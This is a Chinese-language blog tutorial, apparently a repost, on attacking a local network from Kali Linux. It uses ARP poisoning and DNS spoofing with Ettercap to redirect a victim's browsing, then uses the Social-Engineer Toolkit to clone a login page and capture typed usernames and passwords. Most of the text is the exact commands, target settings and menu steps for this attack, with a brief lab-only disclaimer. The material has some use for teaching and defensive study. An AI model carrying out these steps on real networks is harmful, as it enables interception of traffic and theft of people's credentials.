Linux kali内网渗透之DNS劫持+SET社会工程学进行内网钓鱼攻击[通俗易懂]

大家好，又见面了，我是你们的朋友全栈君。

提示：本文章内所有内容环境为自己搭建绝无违法内容，请不要利用其中的技术来做违法的事情。若本文显示图片违规，请点击链接https://mp.weixin.qq.com/s/ZnrPjDJ2Wh1pqKEKCVaG-w跳转至微信公众号阅读

渗透测试环境

受害主机IP：192.168.20.236 攻击主机IP：192.168.20.164 网关：192.168.21.254 若攻击主机kali是虚拟机，需保证虚拟机的kali是桥接模式

收集信息阶段

获取到本机IP地址

ip address

在这里插入图片描述

获取到网关地址

route -n 

在这里插入图片描述

获取内网同网段下正在联网的所有电脑IP地址

fping -g 192.168.20.0/23 

在这里插入图片描述

实施攻击阶段

使用Ettercap中间人攻击工具修改dns域名指向 vim /etc/ettercap/etter.dns 按i进入插入模式

在这里插入图片描述

esc+:wq退出并保存

接下来使用apache2开启一个web服务

首先备份WEB服务器根目录原html文件

sudo cp /var/www/html/index.html  /var/www/html/index_backup.html

然后修改原html文件源码

sudo vim /var/www/html/index.html

删除所有内容命令为：ggdG,其中，gg为跳转到文件首行；dG为删除光标所在行以及其下所有行的内容；再细讲，d为删除，G为跳转到文件末尾行；

在这里插入图片描述

删除完所有内容后，复制写好的html源码插入文件中 （按Shift+insert键将复制的源码粘贴进去）

在这里插入图片描述

然后输入:wq代表写入并退出

随后输入以下命令重启apache2服务

sudo /etc/init.d/apache2 restart

在浏览器输入攻击机kali的IP地址（192.168.20.164）就能看到之前写好的html源码的效果

在这里插入图片描述

输入以下参数对受害主机192.168.20.236进行DNS劫持

ettercap -TqM ARP:remote -P dns_spoof /192.168.21.254// /192.168.20.236//

在这里插入图片描述

-i：指定网卡，一般默认为 eth0 -T：仅使用文本 GUI -q：启动安静模式（不回显的意思） -M：执行中间人攻击 ARP:remote：使用远程嗅探 -P：指定插件 第一个IP为网关地址，第二个IP为受害者主机IP地址

此时受害者访问任何的http网站都会显示被黑

爱奇艺首页

在这里插入图片描述

腾讯首页

在这里插入图片描述

百度首页

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在攻击者主机kali的终端可以看到攻击者主机kali将受害者主机请求的所有http网站都通过Ettercap解析到了自己的web服务器（192.168.20.164）

在这里插入图片描述

由此我们得到一个思路，既然受害者访问的网站可以被我们所控制，那么我们是否可以控制一个仿制网站回显给受害者，然后受害者输入账号密码后，我们可以达到截取账号密码的目的

进一步实践，用 SET（Social-Engineer Toolkit）+Ettercap 进行钓鱼攻击

参考上文修改dns劫持文件中的域名指向为受害者主机需要登录的站点链接(这里对域名进行脱敏处理，若需实践请自行搭建站点测试，勿用于非法用途)

vim /etc/ettercap/etter.dns

在这里插入图片描述

Social-Engineer Toolkit是一个基于python语言开发的社会工程学工具，主要用来进行社工攻击，包括钓鱼网站，无线 AP 攻击，QRCode 攻击。

在攻击机kali终端中输入setoolkit即可启动setoolkit，启动后有可能会要求你同意一个安全条款： The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

选择y同意并进入下一步，到主界面

在这里插入图片描述

输入1并回车，开始社会工程学攻击

在这里插入图片描述

然后，选择菜单中第二个选项，网站攻击。

在这里插入图片描述

选择第三个选项，窃取凭证。

在这里插入图片描述

选择2，网站克隆

在这里插入图片描述

这里直接按回车键，使用默认IP，即是攻击者主机kali自己的IP（192.168.20.164）

在这里插入图片描述

输入要克隆的站点链接

在这里插入图片描述

当提示： []Cloning the website: http://www.xxx.com/ []This could take a little bit… 的时候，我们需要等待一会儿，然后提示： The best way to use this attack is if username and password form Fields are available. Regardless, this captures all POSTs on a website. []You may need to copy /var/www/ into /var/www/html depending on where your directory structure is. Press {return} if you understand what we’re saying here. 的时候，我们再按回车，就可以看到提示网站已经克隆成功，可以运行在攻击者主机IP下的80端口，这里提示我之前开启的apache2的WEB服务占用了80端口，需要我关闭，这里我们输入y确认关闭

在这里插入图片描述

然后显示钓鱼网站就绪

在这里插入图片描述

这时候，在浏览器输入攻击机kali的IP地址（192.168.20.164）就能看到就可以看到网站已经完成克隆。

在这里插入图片描述

跟上文一样，输入以下命令，对受害者主机(192.168.20.236)发起DNS劫持攻击，使得受害者访问真实网站的时候被劫持到钓鱼网站。

ettercap -TqM ARP:remote -P dns_spoof /192.168.21.254// /192.168.20.236//

在这里插入图片描述

当受害者访问真实的网站的时候，则会被攻击者主机kali解析到仿制的钓鱼网站界面

在这里插入图片描述

ping一下受害者访问的真实主机域名，可以得知真实主机域名已被攻击者劫持为自己的IP,同时这里暴露了攻击者的IP地址，留下了攻击痕迹

ping www.xxx.com

在这里插入图片描述

受害者在钓鱼网站输入账号密码后，账号密码作为请求参数显示在攻击者kali的setoolkit终端

在这里插入图片描述

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/172706.html原文链接：https://javaforall.cn